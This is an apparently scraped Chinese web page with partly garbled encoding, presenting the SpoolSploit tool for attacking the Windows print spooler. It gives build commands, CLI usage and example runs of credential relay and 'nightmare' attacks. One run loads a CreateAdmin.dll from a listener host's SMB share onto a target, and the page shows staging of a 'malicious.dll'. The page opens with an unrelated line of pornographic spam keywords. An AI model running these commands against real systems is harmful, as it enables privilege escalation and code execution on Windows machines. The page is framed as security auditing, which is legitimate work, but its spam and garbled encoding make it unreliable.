日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
如何使用SpoolSploit審查Windows打印后臺(tái)處理程序的安全性

關(guān)于SpoolSploit

SpoolSploit是一款針對(duì)Windows打印后臺(tái)處理程序(print spooler)的安全審計(jì)工具,廣大研究人員可以使用SpoolSploit檢測(cè)Windows打印后臺(tái)處理程序(print spooler)中存在的安全漏洞,并通過(guò)實(shí)際的利用技術(shù)來(lái)進(jìn)行滲透測(cè)試或安全審計(jì)。

SpoolSploit中還封裝了很多其他的實(shí)用工具,以便進(jìn)行實(shí)際的漏洞利用和滲透測(cè)試。并實(shí)現(xiàn)了兩種方法來(lái)中繼計(jì)算機(jī)帳戶憑據(jù),以升級(jí)權(quán)限并在具有完全系統(tǒng)訪問(wèn)權(quán)限的節(jié)點(diǎn)上執(zhí)行惡意DLL。

快速開(kāi)始

自該項(xiàng)目發(fā)布之日起,SpoolSploit Docker容器已在最新版本的macOS、Ubuntu Linux和Windows 10上成功測(cè)試。

我們建議廣大用戶在SpoolSploit Docker容器內(nèi)執(zhí)行滲透測(cè)試或憑據(jù)中繼測(cè)試,并托管相應(yīng)的DLL文件,然后確保運(yùn)行Docker容器的主機(jī)上開(kāi)啟并未使用的445端口。在Windows主機(jī)上運(yùn)行此容器時(shí),這種情況最為普遍,因?yàn)槟J(rèn)情況下它使用的是端口445。如果你的主機(jī)上端口445已被占用或無(wú)法使用的話,可以在網(wǎng)橋模式下配置了網(wǎng)絡(luò)適配器的虛擬機(jī)中運(yùn)行Docker容器即可。

(1) 工具下載&訪問(wèn)SpoolSploit容器

首先,使用下列命令將該項(xiàng)目源碼克隆至本地:

 
 
 
  1. git clone https://github.com/BeetleChunks/SpoolSploit 

接下來(lái),構(gòu)建SpoolSploit Docker容器鏡像:

 
 
 
  1. cd SpoolSploit 
  2.  
  3. sudo docker build -t spoolsploit . 

創(chuàng)建并啟動(dòng)SpoolSploit Docker容器:

 
 
 
  1. sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest 

綁定容器:

 
 
 
  1. sudo docker exec -it spoolsploit /bin/bash 

(2) 命令行使用

 
 
 
  1. usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD 
  2.  
  3. optional arguments: 
  4.  
  5.   -h, --help               顯示幫助信息并退出 
  6.  
  7.   -a {spoolsample,nightmare}, --attack {spoolsample,nightmare} 
  8.  
  9.                         需要在目標(biāo)主機(jī)上執(zhí)行的測(cè)試類型 
  10.  
  11.   -rH RHOST, --rhost RHOST 
  12.  
  13.                         遠(yuǎn)程目標(biāo)IP、CIDR范圍或文件名 (file:
  14.  
  15.   -rP {139,445}, --rport {139,445} 
  16.  
  17.                         遠(yuǎn)程SMB服務(wù)器端口 
  18.  
  19.   -lH LHOST, --lhost LHOST 
  20.  
  21.                         監(jiān)聽(tīng)主機(jī)名或IP地址 
  22.  
  23.   -lS LSHARE, --lshare LSHARE 
  24.  
  25.                         SMB共享 (UNC) 
  26.  
  27.   -d DOMAIN, --domain DOMAIN 
  28.  
  29.                         身份認(rèn)證域名 
  30.  
  31.   -u USER, --username USER 
  32.  
  33.                         身份認(rèn)證用戶名 
  34.  
  35.   -p PASSWD, --password PASSWD 
  36.  
  37.                         身份認(rèn)證密碼 

工機(jī)使用樣例

使用樣例1:

 
 
 
  1. python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 

使用樣例2:

 
 
 
  1. python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 

SpoolSample - Windows設(shè)備賬號(hào)憑證獲取和中繼

 
 
 
  1. sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/ 
  2.  
  3. sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll' 

工具使用截圖

項(xiàng)目地址

SpoolSploit:【GitHub傳送門】


當(dāng)前名稱:如何使用SpoolSploit審查Windows打印后臺(tái)處理程序的安全性
文章來(lái)源:http://www.5511xx.com/article/dhegcji.html